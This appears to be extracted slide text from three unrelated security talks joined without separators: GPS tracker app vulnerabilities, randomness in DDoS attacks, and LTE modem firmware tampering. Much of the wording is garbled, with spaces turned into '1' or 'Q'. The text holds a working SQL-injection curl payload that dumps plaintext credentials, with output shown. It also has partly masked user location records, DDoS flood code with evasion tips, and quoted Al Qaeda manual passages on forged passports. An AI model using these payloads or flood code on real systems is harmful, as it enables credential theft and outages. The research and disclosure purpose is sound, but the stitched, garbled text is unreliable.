[{"to_username":“***","to_mobile":"9********4","lat":"2*.644490000000005","lon":"*8.35368","time":"18:55,04-12- 2016"},{"to_username":“****","to_mobile":"9******9","lat":“*0.2916455","lon":“*8.0521764","time":"12:0,27-12- 2016"},{"to_username":“****","to_mobile":"9********2","lat":“*3.8710253","lon":“*5.6093338","time":"18:6,19-11- 2016"},{"to_username":“****","to_mobile":"9*******2","lat":“*6.5958902","lon":"-*7.3897167","time":"13:46,04-12- 2016"},{"to_username":“****","to_mobile":"9*******0","lat":“*2.621241065689713","lon":“*8.33497756126259","time":"9:2 5,20-11-2016"},{"to_username":“****","to_mobile":"4********1","lat":“*1.8925267","lon":"-*1.3928747","time":"3:26,12- 022017"},{"to_username":"","to_mobile":"","lat":"","lon":"","time":""},{"to_username":“***","to_mobile":"9********8", "lat":“*5.262387837283313","lon":“*4.10851701162755","time":"23:47,20-11- 2016"},{"to_username":“****","to_mobile":"9*******6","lat":"0","lon":"0","time":"12:35"},{"to_username":“***","to_mob ile":"8********5","lat":“*5.3401165","lon":“*5.1459643","time":"8:45,21-11- 2016"},{"to_username":“****","to_mobile":"8********8","lat":"0","lon":"0","time":"0:32"},{"to_username":“****","to_mo bile":"9********2","lat":“*2.4393024","lon":"-*5.0414924","time":"23:0,20-11- 2016"},{"to_username":“****","to_mobile":"9********8","lat":“*2.4386613","lon":"-*5.0398665","time":"7:14,21-11- 2016"},{"to_username":“****","to_mobile":"8********6","lat":“*3.7005867","lon":“*6.9793598","time":"17:33,24-12- 2016"},{"to_username":“****","to_mobile":"8********5","lat":“*2.584631","lon":“*8.2787425","time":"20:56,22-11- 2016"},{"to_username":“*****","to_mobile":"8********1","lat":“*2.7993167","lon":“*6.2369126","time":"17:49,26-11- 2016"},{"to_username":“****","to_mobile":"9*******5","lat":“*2.5846746","lon":“*8.2787492","time":"18:28,21-11- 2016"},{"to_username":“***","to_mobile":"8*******7","lat":“*2.4069115","lon":"-*1.1435983",... 
128 SQL - Simple Accessing Images § Cloud1storage for images Accessing Images § Cloud1storage for images § “One cloud“1for all1images Accessing Images § Cloud1storage for images § “One cloud“1for all1images § User1authentication required § Filter1correspondingimages by user id Accessing Images § Cloud1storage for images § One cloud for all1images § User1authentication required § Filter1correspondingimages by user id § Compromise the cloud to get access to all1images 133 Demo Time ! Get all User Credentials § App1provides1an1API1and1a1process1for1reinstallation1of1the1app 1. App1checks1if1user1already1has1an1account 2. Sends1device1id1to1the1server POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":"c1b86d87ed6f51011c0d53a654f16455"} Get all User Credentials § App1provides1an1API1and1a1process1for1reinstallation1of1the1app 1. App1checks1if1user1already1has1an1account 2. Sends1device1id1to1the1server 3. Server1checks1if1id1exists1and1responses1with: username,QpasswordQandQemail POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":"c1b86d87ed6f51011c0d53a654f16455"} Attack Strategy § Spoofing the device id will1deliver us credentialsBUT device id generation is relative1complex and guessing is unlikely Attack Strategy § Spoofing the device id will1deliver us credentialsBUT device id generation is relative1complex and guessing is unlikely § Empty1id trick does not1work L POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":" "} Attack Strategy § Spoofing the device id will1deliver us credentials § BUT1device id generation is relative1complex and guessing is unlikely § Empty1id trick does not1work L § Let‘s try SQL1injection again J POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":" 'Qor 1=1QQQlimit 1Qoffset 5Q-- "} SQL-Injection § Curl Command: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 5 -- \"}" http://push001.***********/*********/v5/ SQL-Injection § Curl Command: § Result: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 5 -- \"}" http://push001.***********/*********/v5/ {"result":"success", "id":"yb*****","pass":"y********4","email":"y*****@hanmail.net"} plaintext password SQL-Injection § Curl Command: § Result: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 6 -- \"}" http://push001.***********/*********/v5/ {"result":"success", "id":"se*****","pass":"qwe*******4","email":"se*****@gmail.com"} plaintext password iterate over the offset SQL-Injection § Curl Command: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 1700400 -- \"}" http://push001.***********/*********/v5/ iterate over the offset >Q1.700.000Qplaintext credentials 143 WTF ? 
Firebase https://firebase.google.com/ Authentication Misconfiguration attacker tracker backend http://*******/*****celltracker/api Authentication Misconfiguration attacker tracker backend POST1/*******celltracker/api/login HTTP/1.1 {"user_email":"foo@bar.com"} victim email Authentication Misconfiguration attacker tracker backend HTTP/1.112001OK {"login_data":[{"user_id":"149737514214639",…} Authorisation Misconfiguration attacker https://*****************.firebaseio.com/Users/149737514214639 Location without Authorisation attacker HTTP/1.112001OK { last_location={ address=1Rheinstraße1751642951Darmstadt1Germany date=13/06/2017 lat=49.8717048 long=8.6387116 … } Faceplam Light But there is More attacker HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } But there is More attacker HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } Sh** happens What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules What‘s wrong ? 
§ Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must be done on1server side What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must be done on1server side § Provider1Backend1must handle1the authentication process for the firebase storage or even better use Firebase API* *https://firebase.google.com/docs/auth/ What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must1be done on1server side § Provider1Backend1must1handle1the authentication process for the firebase storage or even better use Firebase API* § Worst case,1if1you1submit1the1parent1URL1without the1concrete1user1 ID,1you1get1all1the1data1=>1firebase1misconfiguration *https://firebase.google.com/docs/auth/ Agenda 162 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction § Some1apps1removed1from1play1store1(121of119)1 § Still1vulnerable1backends and1apps1in1the1store Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction § Some1apps1removed1from1play1store1(121of119)1 § Still1vulnerable1backends and1apps1in1the1store § Some1app1are1detected1as1malware1(e.g.1Firefox1download1blocker) Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security § DON’T1store1any1user1secrets1in1the1app1(client1side) *https://firebase.google.com/docs/auth/ Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security § DON’T1store1any1user1secrets1in1the1app1(client1side) § If1you1provide1premium1or1payment1feature,1do1verification1on1server1 § 
Authentication and authorization for backend data (e.g. firebase*) *https://firebase.google.com/docs/auth/ Agenda 172 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 173 Client-Side Vulnerability / Direct Data Breach: My Family GPS Tracker X KidControll GPS Tracker X Family Locator (GPS) X X Free Cell Tracker X X Rastreador de Novia 1 X X Rastreador de Novia 2 X X Phone Tracker Free X X Phone Tracker Pro X X Rastrear Celular Por el Numero X X Localizador de Celular GPS X X Rastreador de Celular Avanzado X X Handy Orten per Handynr X X Localiser un Portable avec son Numero X X Phone Tracker By Number X X Track My Family X X Couple Vow X Real Time GPS Tracker X Couple Tracker App X Ilocatemobile X Siegfried Rasthofer Email: siegfried.rasthofer@sit.fraunhofer.de Web: www.rasthofer.info Stephan Huber Email: stephan.huber@sit.fraunhofer.de Twitter: @teamsik Website: www.team-sik.org
Take advantage of randomness Frank Tse Nexusguard Agenda What is random Some applications of random Detecting anomalies from randomness Mitigating ‘random’ attacks 1 2 3 4 Visualizing randomness 5 About::me From Hong Kong Researcher in DDoS I like RFC IT Security Identify them correctly Take actions accordingly Block the known bad Verify the known good Track the uncertain Challenge the suspicious DDoS: Good Human > Adult, Kid, Infant Bad Human > Smart, not-so-smart Good Bot (inhuman) Bad bot (inhuman) General IT security vs DDoS /dev/random Entropy: initial seeds for random number generation kern.random.sys.seeded non-blocking while reading kern.random.sys.harvest.ethernet LAN traffic kern.random.sys.harvest.point_to_point P2P interface kern.random.sys.harvest.interrupt HW interrupt (Mouse, keyboard) kern.random.sys.harvest.swi SW interrupt (exceptions) Initializing seed for random during boot up (HW) Entropy: initial seeds for random number generation If I’m running on VM [ 0.000000] Booting paravirtualized kernel on KVM virtio-rng: a driver for feeding entropy between VM guest and host Problem: I don’t trust virto-rng Solution: entropy from remote server entropy.ubuntu.com Angers Bridge, collapsed on Apr-16, 1850, due to soldiers marching across it. aka. “Stuck in synchronization” 2009 MAY 19, Storm Codec [ Baofeng] (暴风影音) brings down DNSpod. Due to lack of random back-off and sleep mechanism Routing protocol randomized hello timers to avoid ‘stuck in synchronization” RFC4271 – Border Gateway Protocol v4 To minimize the likelihood that the distribution of BGP messages by a given BGP speaker will contain peaks, jitter SHOULD be applied to the timers associated with MinASOriginationIntervalTimer, KeepaliveTimer, MinRouteAdvertisementIntervalTimer, and ConnectRetryTimer. A given BGP speaker MAY apply the same jitter to each of these quantities, regardless of the destinations to which the updates are being sent; that is, jitter need not be configured on a per-peer basis. The suggested default amount of jitter SHALL be determined by multiplying the base value of the appropriate timer by a random factor, which is uniformly distributed in the range from 0.75 to 1.0. A new random value SHOULD be picked each time the timer is set. The range of the jitter's random value MAY be configurable. C&C Communication Software update check Generating Randomart from SSH host key fingerprint $ ssh root@myhost -o VisualHostKey=yes Host key fingerprint is ce:7f:ee:de:c0:87:bb:63:8b:ae:d3:6d:08:4d:d4:8f +--[ RSA 2048]----+ | . | | . . | | . o | | . E . | | So | | o. .. . | | oo o+ . | | ..o.*= | | .++BB+. | +-----------------+ Without randomness CVE-2008-1447: DNS Cache Poisoning Issue allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka "DNS Insufficient Socket Entropy Vulnerability" or "the Kaminsky bug." 
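The RFC 4271 jitter passage quoted above is tiny to implement; a minimal sketch of the idea follows (the base timer value is illustrative).

# Minimal sketch of RFC 4271-style jitter: scale the base timer by a uniform
# random factor in [0.75, 1.0] every time it is armed, so peers that start in
# lock-step drift apart instead of staying "stuck in synchronization".
import random

def jittered(base_seconds: float) -> float:
    return base_seconds * random.uniform(0.75, 1.0)

KEEPALIVE_BASE = 60.0   # illustrative base value
print([round(jittered(KEEPALIVE_BASE), 1) for _ in range(5)])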
Without randomness TCP Reset attacks / predictable TCP source port The easiest way to implement ‘random TCP src port’ is counter++ OSX keep TCP source port++ for each new request, same as Windows How online services support random password Ideal Random password Alphanumeric + limited special chars + Password policy Alphanumeric + limited special chars Alphanumeric Numeric only Phone compatible services Variants by languages & site owners Lazy administrators Variants by languages & site owners, + Totally insane RANDOM randomness policy DDoS attacks – the art of evasion Attack goes undetected is getting harder 0-days on protocol are getting harder to dig out Detections are implementing closer to bots Security awareness increased by site owners DDoS tools are mostly open sources Signatures of DDoS tools can be easily implemented Websites are behind mitigation filters or CDNs A successful DDoS attacks is Make as many false possible as possible Detection and mitigation filter never trigger Real server believes it is from a legitimate user Level 0.0 – Bandwidth attacks 100% stateless, even initiated in TCP 99.99% chance of being block since the port is not open 99% chance of being block from source Your botnet may disconnect from command updates Level 0.1 – Bandwidth attacks 100% stateless, mostly works with UDP Attack power relies on intermediate victim servers Attack efficiency relies on amplification factor It’s easy to detect, and it’s from fixed source port J Reflected Normal Traffic Attack traffic Src port Src port Dst port Dst port Level 1.0 – TCP SYN Flood 100% stateless 99.99% using spoof IP 99% complies with RFC but not exists in real world RFC 793 (TCP) is 33 years old Ø  it didn’t say what you should not spoof Ø  it didn’t say what TCP ACK you should pick during TCP handshake Ø  It didn’t say how many TCP Options you should include during handshake Level 1.0 – TCP SYN Flood Sendtcp.c (hping3-20051105) /* sequence number and ack are random if not set */ tcp->th_seq = (set_seqnum) ? htonl(tcp_seqnum) : htonl(rand()); tcp->th_ack = (set_ack) ? 
htonl(tcp_ack) : htonl(rand()); sequence++; /* next sequence number */ if (!opt_keepstill) src_port = (sequence + initsport) % 65536; Main.c /* set initial source port */ if (initsport == -1) initsport = src_port = 1024 + (rand() % 2000); It’s easy to spot HPING from source port and non-zero tcp_ack # Level 1.0 – TCP SYN Flood Randomness detection can be based on COMBINATION of fields Insane packet can be dropped: tcp.flags == 0x02 && (ip.len – 40)%4 !=0 Level 2.0 – HTTP GET Flood - static for ((i=0;i<100;i++)) do `wget target.com &`; done It’s is legitimate but it’s dummy and static it’s HTTP/1.0 lack of HTTP headers Distribution of requests are spectrum like not as random as expected How to mitigate block tcp.flags == 0x18 and ip.len < 100 and tcp.dstport == 80 Level 2.1 – HTTP GET Flood – static random GET / HTTP/1.1 Host: www.nexusguard.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31 Referer: https://www.facebook.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 This is legitimate request Level 2.1 – HTTP GET Flood – static random GET / HTTP/1.1 Host: www.nexusguard.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: $VARIABLE Referer: https://www.facebook.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 This is how attacker try to variety Hulk.py #builds random ascii string def buildblock(size): out_str = ’’ for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) Level 2.1 – HTTP GET Flood – static random Hulk.py # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/ 20090913 Firefox/3.5.3’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/ 532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/ 4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/ 4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)’) headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)’) headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents) Level 2.1 – HTTP GET Flood – static random DirtJumper v5 User Agent selector Level 2.2 – HTTP GET Flood – dynamic random #http 
request def httpcall(url): request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache’) request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7’) request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive’) request.add_header('Host',host) Don’t do unreasonable random for the sake of randomness confusion Normal HTTP keep-alive range doesn’t fall in this range Level 2.2 – HTTP GET Flood – dynamic random Uagent.php // random user-agent generator function nt_version() return rand(5, 6) . '.' . rand(0, 1); function ie_version() // IE return rand(7, 9) . '.0’; function osx_version() // need to add support for OSX10.10 J return "10_" . rand(5, 7) . '_' . rand(0, 9); function chrome_version() return rand(13, 15) . '.0.' . rand(800, 899) . '.0'; Hint: Predict next version by time (build-in script) Level 2.2 – HTTP GET Flood – dynamic random Uagent.php // random user-agent generator function firefox($arch) { $ver = array_random(array( 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0’, 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0.1’, 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.6.' . rand(1, 20), 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.8’ )); switch ($arch) { // firefox for Linux, Mac and Win with different processers case 'lin’: return "(X11; Linux {proc}; rv:" . rand(5, 7) . ".0) $ver"; case 'mac': $osx = osx_version(); return "(Macintosh; {proc} Mac OS X $osx rv:" . rand(2, 6) . ".0) $ver »; case 'win’: default: $nt = nt_version(); return "(Windows NT $nt; {lang}; rv:1.9." . rand(0, 2) . 
".20) $ver »; } } Level 2.3 – HTTP GET Flood – smart random User-agents are not randomly distributed 0% 20% 40% 60% 80% 100% 2002 2004 2006 2008 2010 2012 2014 Others IE Firefox/Mozilla Chrome 0% 20% 40% 60% 80% 100% Legitimate UA distribution by year Attack UA distribution by year Level 2.3 – HTTP GET Flood – smart random User-agents are not randomly distribute function chooseRandomBrowserAndOS() { $frequencies = array( 34 => array( 89 => array('chrome', 'win'), 9 => array('chrome', 'mac'), 2 => array('chrome', 'lin’) ), 32 => array( 100 => array('iexplorer', 'win’)), 25 => array( 83 => array('firefox', 'win'), 16 => array('firefox', 'mac'), 1 => array('firefox', 'lin’)), 7 => array( 95 => array('safari', 'mac'), 4 => array('safari', 'win'), 1 => array('safari', 'lin’)), 2 => array( 91 => array('opera', 'win'), 6 => array('opera', 'lin'), 3 => array('opera', 'mac’)) ); Level 2.3 – HTTP GET Flood – dynamic random 100% predictable URL and parameter 100% predictable HTTP header order 99% purely randomize in pre-defined character space ADDRESS ORDERS MATTERS - because RFC2616 HTTP/1.1 only specific required headers, not orders - implementation of HTTP header order is depending on OS - Orders can be normalized / corrected by CDN, thank you CDN J CHARACTER SPACE MATTERS -  Pure random is easy to be detected -  Attack character space didn’t fit with distribution of normal request Level 3.0 – HTTP GET Flood – emulated random Al Qaeda Handbook - The Manchester Manual Lesson 3 Forged Documents (Identity Cards, Records Books, Passports) Forged Documents (Identity Cards, Records Books, Passports) The following security precautions should be taken: 1. Keeping the passport in a safe place so it would not be ceized by the security apparatus, and the brother it belongs to would have to negotiate its return (I’ll give you your passport if you give me information) 2. All documents of the undercover brother, such as identity cards and passport, should be falsified. 3. When the undercover brother is traveling with a certain identity card or passport, he should know all pertinent [information] such as the name, profession, and place of residence. Use Proxy X-forwarded-IP X-Client-IP Always spoof User-agent Behave and react as claimed, real UA Level 3.0 – HTTP GET Flood – emulated random 4. The brother who has special work status (commander, communication link, ...) should have more than one identity card and passport. He should learn the contents of each, the nature of the [indicated] profession, and the dialect of the residence area listed in the document. 5. The photograph of the brother in these documents should be without a beard. It is preferable that the brother’s public photograph [on these documents] be also without a beard. If he already has one [document] showing a photograph with a beard, he should replace it. 6. When using an identity document in different names, no more than one such document should be carried at one time. 
Use anonymous proxy Use anonymous network (TOR) Never use real IP to send C&C command or send attack Don’t send too much traffic from a single machine Level 3.0 – HTTP GET Flood – emulated random Now attacks are emulating from real users, with Ø  Low request rate Ø  From normally distributed source IP (GEO-IP) Ø  Totally valid TCP and IP headers Ø  Legitimate user-agents Ø  Legitimate user-agents with up-to-date distribution Ø  Correct HTTP headers and orders Level 3.0 – HTTP GET Flood – emulated random p0f Passive, progressive, layered validation Level 3.0 – HTTP GET Flood – emulated random behavior Progressive, application specific challenge, Level 3.0 – HTTP GET Flood – emulated random Level BOSS – DDoS the legitimate client Attacker knows your clients’ IPs Attacker knows your detection policies Attacker knows your mitigation filters Attacker can launch ‘targeted’ DDoS by spoofing legitimate client Proudly Present “APT Style” DDoS Level BOSS – DDoS the legitimate client False Positive False Negative A + B = Constant Level BOSS – DDoS the legitimate client OR Draw this fractal with 2 lines of code Max. string 200 One of the acceptable sample output: bhvbhdjmnnmbfjnfghjbnvghvbv Questions? Contact me via ‘random’ e-mail above
This talk is not about LTE vulnerabilities No cables Why isn’t it working? Scared Poopless – LTE and *your* laptop Disclaimer: During the slides you will be exposed to hacker stock photos from the internet. Thank you! Goldy aSmig @octosavvi Intel Security would like to acknowledge and thank the Huawei PSIRT team for their responsiveness and cooperation on this issue. • CVE-2015-5367: Insecure Linux Image in Firmware • CVE-2015-5368: Insecure Firmware Update Authentication http://huawei.com/en/security/psirt/security- bulletins/security-advisories/hw-446601.htm DEMO What did I just see? This is not a problem Remember kids! This is why you should do secure firmware updates NEVER FORGET Adam Caudill Brandon Wilson Who are we? @jessemichael @laplinker Background • Internal LTE/3G modems and who uses them? I like to use my own keyboard • Internal LTE/3G modems and who uses them? • Business class devices I think I have an idea! • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? Card against humanity 2015 world champion • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? PCIe ×2, SATA, USB 2.0 and 3.0, Audio, PCM, IUM, SSIC and I2C I forgot mac’s don’t have a CD drive anymore • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? • USB?! Crap! I just stabbed my usb thumb drive! • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in? • USB?! • Why hack this device anyway? Respect the gas/ski mask Background • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in? • USB?! • Why hack this device anyway? • Module available worldwide • It’s plugged in [INSIDE] your laptop/tablet • Software • Firmware • Hardware • Software • Windows utility for firmware updates • Firmware • Hardware • Software • Windows utility for firmware updates • Firmware • Packed in software utility • Hardware Low-cost anonymity • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware What do you mean you can see my face? • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware • Test pads? • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware • Test pads? Got root shell! Happy shell dance Obligatory success meme • We have root shell on a linux run, independent device inside the physical platform. There is someone behind me isn’t there? 
Firmware structure 92-byte file header 98-byte object header dword at offset 0x5E: object block size word at offset 0x5C: object header CRC dword at offset 0x18: object data size data block 0 word at offset 0x00: data block 0 CRC word at offset 0x02: data block 1 CRC word at offset N*2: data block N CRC data block N data block 1 98-byte object header dword at offset 0x5E: object block size word at offset 0x5C: object header CRC dword at offset 0x18: object data size data block 0 word at offset 0x00: data block 0 CRC word at offset 0x02: data block 1 CRC word at offset N*2: data block N CRC data block N data block 1 Data size relationships CRC value/data correspondence Creeper hacker Updater patch • Updater checks CRC • Updater calculates the correct CRC and compares to the one in the firmware image • Modify updater code to save correct CRC in image instead of comparing it • Total op code change = 6 (not including NOP padding) How do I laptop? Summary • We had a cool demo! • There is such a thing as an insider threat, literally. • Secure your firmware updates. Questions?
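The object-header layout described at the start of this firmware section is easy to walk with a few struct reads. A rough sketch follows: endianness is assumed little-endian (the slides do not say), the file path is illustrative, and only the fields named on the slides are read.

# Rough sketch of reading the layout described above: 92-byte file header,
# then a 98-byte object header whose data size sits at +0x18, header CRC at
# +0x5C and block size at +0x5E, followed by one 16-bit CRC per data block.
# Little-endian is an assumption; the slides do not state endianness.
import struct

FILE_HEADER_LEN = 92
OBJ_HEADER_LEN = 98

def parse_first_object(image: bytes):
    hdr = image[FILE_HEADER_LEN:FILE_HEADER_LEN + OBJ_HEADER_LEN]
    data_size = struct.unpack_from("<I", hdr, 0x18)[0]
    hdr_crc   = struct.unpack_from("<H", hdr, 0x5C)[0]
    blk_size  = struct.unpack_from("<I", hdr, 0x5E)[0]
    n_blocks  = -(-data_size // blk_size) if blk_size else 0
    return data_size, blk_size, hdr_crc, n_blocks

with open("firmware.bin", "rb") as f:   # path illustrative
    size, blk, crc, blocks = parse_first_object(f.read())
    print(f"data={size} bytes in {blocks} blocks of {blk}, "
          f"header CRC=0x{crc:04x}; {blocks} 16-bit block CRCs precede the data")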
